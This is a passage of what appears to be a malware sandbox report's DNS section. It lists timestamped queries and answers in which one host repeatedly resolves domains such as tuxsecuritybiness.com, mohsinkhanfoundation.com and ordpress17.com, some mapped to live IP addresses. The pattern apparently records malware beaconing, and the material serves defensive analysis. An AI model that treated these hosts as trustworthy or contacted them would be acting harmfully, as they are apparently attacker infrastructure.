                                          Sep 27, 2021 20:26:30.912945032 CEST192.168.2.78.8.8.80xc32Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:31.319029093 CEST192.168.2.78.8.8.80xb007Standard query (0)lendbiz.vnA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:31.693260908 CEST192.168.2.78.8.8.80xf59bStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:32.481089115 CEST192.168.2.78.8.8.80xde6Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:33.277252913 CEST192.168.2.78.8.8.80x7889Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:34.087224007 CEST192.168.2.78.8.8.80x5b34Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:34.868655920 CEST192.168.2.78.8.8.80x6794Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:35.848607063 CEST192.168.2.78.8.8.80x3f6Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:37.423644066 CEST192.168.2.78.8.8.80x9487Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:39.222430944 CEST192.168.2.78.8.8.80x5074Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:40.120208025 CEST192.168.2.78.8.8.80x6e95Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:40.930840015 CEST192.168.2.78.8.8.80x49c9Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:41.785125017 CEST192.168.2.78.8.8.80x466bStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:45.583859921 CEST192.168.2.78.8.8.80x8974Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:46.358287096 CEST192.168.2.78.8.8.80x5395Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:47.157856941 CEST192.168.2.78.8.8.80x7728Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:47.923732996 CEST192.168.2.78.8.8.80x575cStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:48.714202881 CEST192.168.2.78.8.8.80x3d0Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:49.501499891 CEST192.168.2.78.8.8.80x9832Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:50.268588066 CEST192.168.2.78.8.8.80xab34Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:51.032918930 CEST192.168.2.78.8.8.80x127bStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:51.799602032 CEST192.168.2.78.8.8.80xa24aStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:52.568475008 CEST192.168.2.78.8.8.80xa0dbStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:53.348994970 CEST192.168.2.78.8.8.80xd59bStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:54.144356012 CEST192.168.2.78.8.8.80xfc2eStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:55.192473888 CEST192.168.2.78.8.8.80xfc2eStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:55.996365070 CEST192.168.2.78.8.8.80x6bebStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:56.759000063 CEST192.168.2.78.8.8.80x23d5Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:57.537885904 CEST192.168.2.78.8.8.80xf177Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:58.304603100 CEST192.168.2.78.8.8.80x1cb2Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:59.087606907 CEST192.168.2.78.8.8.80xb21fStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:59.871004105 CEST192.168.2.78.8.8.80x829bStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:00.683235884 CEST192.168.2.78.8.8.80x9009Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:01.461709023 CEST192.168.2.78.8.8.80x2bd3Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:02.250102997 CEST192.168.2.78.8.8.80x20e5Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:03.026706934 CEST192.168.2.78.8.8.80x6be0Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:03.821991920 CEST192.168.2.78.8.8.80xc972Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:04.598339081 CEST192.168.2.78.8.8.80x5e5aStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:05.373821974 CEST192.168.2.78.8.8.80xd82eStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:06.131067991 CEST192.168.2.78.8.8.80xaa85Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:06.934273005 CEST192.168.2.78.8.8.80x4462Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:07.699145079 CEST192.168.2.78.8.8.80xd1bdStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:08.462414026 CEST192.168.2.78.8.8.80x874cStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:09.264369011 CEST192.168.2.78.8.8.80xb876Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:10.073828936 CEST192.168.2.78.8.8.80x8171Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:10.844527960 CEST192.168.2.78.8.8.80xb8a8Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:11.619561911 CEST192.168.2.78.8.8.80x2b76Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:12.415213108 CEST192.168.2.78.8.8.80xf6e7Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:13.213284969 CEST192.168.2.78.8.8.80xc17aStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:13.980892897 CEST192.168.2.78.8.8.80xbf1cStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:14.761775017 CEST192.168.2.78.8.8.80xa512Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:15.560414076 CEST192.168.2.78.8.8.80xa5c0Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:16.340569019 CEST192.168.2.78.8.8.80x97ffStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:17.120476007 CEST192.168.2.78.8.8.80x85a3Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:17.918859959 CEST192.168.2.78.8.8.80x88e5Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:18.677347898 CEST192.168.2.78.8.8.80xaac1Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:19.852977037 CEST192.168.2.78.8.8.80xbc6fStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:20.666625977 CEST192.168.2.78.8.8.80xaab9Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:21.464464903 CEST192.168.2.78.8.8.80x2098Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:22.228491068 CEST192.168.2.78.8.8.80xbcbbStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:23.027650118 CEST192.168.2.78.8.8.80x5f23Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:23.797799110 CEST192.168.2.78.8.8.80xcd2aStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:24.591423988 CEST192.168.2.78.8.8.80xdd12Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:25.383204937 CEST192.168.2.78.8.8.80x16d4Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:26.638611078 CEST192.168.2.78.8.8.80xd6e4Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:28.365613937 CEST192.168.2.78.8.8.80x4f05Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:29.136183977 CEST192.168.2.78.8.8.80x4806Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:29.932790041 CEST192.168.2.78.8.8.80x493eStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:30.744966030 CEST192.168.2.78.8.8.80x8e55Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:31.530476093 CEST192.168.2.78.8.8.80x509Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:32.291270971 CEST192.168.2.78.8.8.80x1e02Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:33.093796968 CEST192.168.2.78.8.8.80x8a56Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:33.907108068 CEST192.168.2.78.8.8.80x67fcStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:34.684026003 CEST192.168.2.78.8.8.80x958cStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:35.466766119 CEST192.168.2.78.8.8.80x4b1aStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:37.263170004 CEST192.168.2.78.8.8.80xb448Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:38.028683901 CEST192.168.2.78.8.8.80x3aadStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:38.809356928 CEST192.168.2.78.8.8.80x834cStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:39.607177973 CEST192.168.2.78.8.8.80xc895Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:40.668811083 CEST192.168.2.78.8.8.80x17Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:41.427077055 CEST192.168.2.78.8.8.80x6290Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:42.570655107 CEST192.168.2.78.8.8.80xcab3Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:43.368947983 CEST192.168.2.78.8.8.80xfa04Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:44.244988918 CEST192.168.2.78.8.8.80xf4b3Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:45.531595945 CEST192.168.2.78.8.8.80xf868Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:47.080384016 CEST192.168.2.78.8.8.80xf868Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:47.887803078 CEST192.168.2.78.8.8.80x63f5Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:48.671917915 CEST192.168.2.78.8.8.80x4b69Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Sep 27, 2021 20:25:46.122905970 CEST8.8.8.8192.168.2.70xed48No error (0)hoteloaktree.com185.67.1.94A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:46.477045059 CEST8.8.8.8192.168.2.70x1ca0Name error (3)aterwellnessinc.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:46.642173052 CEST8.8.8.8192.168.2.70x61fcNo error (0)sirifinco.com162.215.253.14A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:47.184863091 CEST8.8.8.8192.168.2.70xe91No error (0)sirifinco.com162.215.253.14A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:47.781789064 CEST8.8.8.8192.168.2.70x43e8Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:47.826519966 CEST8.8.8.8192.168.2.70x292aNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:48.585489988 CEST8.8.8.8192.168.2.70xe508Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:48.621702909 CEST8.8.8.8192.168.2.70x3911No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:49.407346964 CEST8.8.8.8192.168.2.70xd446Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:49.445404053 CEST8.8.8.8192.168.2.70x2283No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:49.454132080 CEST8.8.8.8192.168.2.70xd318No error (0)r3.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 20:25:49.538041115 CEST8.8.8.8192.168.2.70xeb28No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)
                                          Sep 27, 2021 20:25:50.391757965 CEST8.8.8.8192.168.2.70xa5ddName error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:50.409461975 CEST8.8.8.8192.168.2.70xa668No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:51.694057941 CEST8.8.8.8192.168.2.70x144eName error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:51.713299990 CEST8.8.8.8192.168.2.70x5b79No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:52.400687933 CEST8.8.8.8192.168.2.70x524eName error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:52.419859886 CEST8.8.8.8192.168.2.70x5cc9No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:52.537311077 CEST8.8.8.8192.168.2.70x2148Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:53.120194912 CEST8.8.8.8192.168.2.70x4064Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:53.141144037 CEST8.8.8.8192.168.2.70x1c01No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.043450117 CEST8.8.8.8192.168.2.70xd66eName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.108280897 CEST8.8.8.8192.168.2.70xf44eName error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.125935078 CEST8.8.8.8192.168.2.70x26daNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.815829992 CEST8.8.8.8192.168.2.70xeb44Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.867284060 CEST8.8.8.8192.168.2.70x4e0cName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.867326021 CEST8.8.8.8192.168.2.70xdb52No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:55.739996910 CEST8.8.8.8192.168.2.70xe43eName error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:55.782393932 CEST8.8.8.8192.168.2.70x1154Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:55.782442093 CEST8.8.8.8192.168.2.70xb28bNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:56.433779955 CEST8.8.8.8192.168.2.70x3a39Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:56.451993942 CEST8.8.8.8192.168.2.70xd9c3No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:57.121294022 CEST8.8.8.8192.168.2.70x8f3aName error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:57.141964912 CEST8.8.8.8192.168.2.70xa53fNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:57.813699007 CEST8.8.8.8192.168.2.70xba03Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:57.878588915 CEST8.8.8.8192.168.2.70x6ec4No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:58.589430094 CEST8.8.8.8192.168.2.70xa662Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:58.607362032 CEST8.8.8.8192.168.2.70x6f6dNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:59.640908003 CEST8.8.8.8192.168.2.70xd3a7Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:00.669476986 CEST8.8.8.8192.168.2.70xa418Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:00.693370104 CEST8.8.8.8192.168.2.70x5202No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:01.344700098 CEST8.8.8.8192.168.2.70x485aName error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:01.365263939 CEST8.8.8.8192.168.2.70x833No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:01.464349031 CEST8.8.8.8192.168.2.70x7abbName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:02.052011013 CEST8.8.8.8192.168.2.70xad79Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:02.070492029 CEST8.8.8.8192.168.2.70x74e4No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:02.400717974 CEST8.8.8.8192.168.2.70x8d2cName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:02.827584028 CEST8.8.8.8192.168.2.70xb84cName error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:02.848720074 CEST8.8.8.8192.168.2.70x14a9No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:03.362535954 CEST8.8.8.8192.168.2.70x291bName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:03.554991007 CEST8.8.8.8192.168.2.70xc730Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:03.594930887 CEST8.8.8.8192.168.2.70x8caaNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:04.184688091 CEST8.8.8.8192.168.2.70x58ddName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:04.267692089 CEST8.8.8.8192.168.2.70xe1abName error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:04.285075903 CEST8.8.8.8192.168.2.70xd25eNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:05.009361982 CEST8.8.8.8192.168.2.70x3ae2Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:05.011293888 CEST8.8.8.8192.168.2.70x1cc3Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:05.030112982 CEST8.8.8.8192.168.2.70xe823No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:05.771013975 CEST8.8.8.8192.168.2.70x3261Name error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:05.792582989 CEST8.8.8.8192.168.2.70xc32dNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:05.829721928 CEST8.8.8.8192.168.2.70xb3e9Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:06.530939102 CEST8.8.8.8192.168.2.70x919bName error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:06.563410044 CEST8.8.8.8192.168.2.70xe31fNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:06.621680975 CEST8.8.8.8192.168.2.70xa05dName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:07.260509968 CEST8.8.8.8192.168.2.70xd3ceName error (3)ordpress17.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:07.277765036 CEST8.8.8.8192.168.2.70x58caNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:07.441679001 CEST8.8.8.8192.168.2.70x700eName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:08.027592897 CEST8.8.8.8192.168.2.70x4928No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:08.230581999 CEST8.8.8.8192.168.2.70xefa0Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:08.688290119 CEST8.8.8.8192.168.2.70xf5e3No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:09.041362047 CEST8.8.8.8192.168.2.70xa130Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:09.381016970 CEST8.8.8.8192.168.2.70xd860No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:09.837686062 CEST8.8.8.8192.168.2.70xc058Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:10.057593107 CEST8.8.8.8192.168.2.70x92c1No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:10.650757074 CEST8.8.8.8192.168.2.70x4737Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:10.779675007 CEST8.8.8.8192.168.2.70xbe06No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:11.434880018 CEST8.8.8.8192.168.2.70x35cbName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:11.473371029 CEST8.8.8.8192.168.2.70x24e3No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:12.172019005 CEST8.8.8.8192.168.2.70xc921No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:12.266151905 CEST8.8.8.8192.168.2.70xe6bfName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:12.873389006 CEST8.8.8.8192.168.2.70x4c70No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:13.035274029 CEST8.8.8.8192.168.2.70x237cName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:13.532562971 CEST8.8.8.8192.168.2.70x9e77No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:13.821945906 CEST8.8.8.8192.168.2.70xbb50Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:14.169934034 CEST8.8.8.8192.168.2.70x6d56No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:14.628648996 CEST8.8.8.8192.168.2.70xd043Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:14.825664997 CEST8.8.8.8192.168.2.70x2fd3No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:15.422096014 CEST8.8.8.8192.168.2.70x812fName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:15.511173010 CEST8.8.8.8192.168.2.70xea9eNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:16.141031981 CEST8.8.8.8192.168.2.70x7afcNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:16.192023039 CEST8.8.8.8192.168.2.70xf614Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:16.948764086 CEST8.8.8.8192.168.2.70xddbeNo error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:17.006040096 CEST8.8.8.8192.168.2.70x7a5cName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:18.324116945 CEST8.8.8.8192.168.2.70x158No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:18.394996881 CEST8.8.8.8192.168.2.70xd7a6Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:20.000881910 CEST8.8.8.8192.168.2.70xdbb7No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:20.170842886 CEST8.8.8.8192.168.2.70x3925Name error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:20.775252104 CEST8.8.8.8192.168.2.70xc814No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:20.935945034 CEST8.8.8.8192.168.2.70x83cName error (3)tuxsecuritybiness.comnonenoneA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:21.468765020 CEST8.8.8.8192.168.2.70xe784No error (0)mohsinkhanfoundation.com107.180.44.125A (IP address)IN (0x0001)
